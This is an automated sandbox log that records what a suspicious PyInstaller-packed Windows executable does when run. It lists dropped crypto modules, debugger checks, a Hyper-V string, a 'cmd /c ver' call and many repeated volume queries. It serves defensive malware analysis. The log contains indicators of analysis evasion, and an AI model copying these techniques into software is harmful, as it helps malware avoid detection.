      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_asyncio.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_lzma.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_strxor.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD4.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ecb.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_clmul.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_RIPEMD160.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB3DF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6E5AB3DF0
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD2.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_arc2.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2b.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cast.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des3.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD4.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_RIPEMD160.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E5AC6714
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB7820 FindFirstFileExW,FindClose,0_2_00007FF6E5AB7820
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E5AC6714
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD09B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6E5AD09B4
      Source: 322pVOVprx.exe, 00000001.00000003.306010144.0000023E95988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
      Source: 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309636596.0000023E957C4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.306937511.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307778546.0000023E957C6000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349928799.0000023E957C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E5ABB69C
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD25A0 GetProcessHeap,0_2_00007FF6E5AD25A0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABB180 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,0_2_00007FF6E5ABB180
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E5ABB69C
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6E5ABAE00
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABB880 SetUnhandledExceptionFilter,0_2_00007FF6E5ABB880
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC9AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E5AC9AE4
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exeJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\certifi VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\_bz2.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\_lzma.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
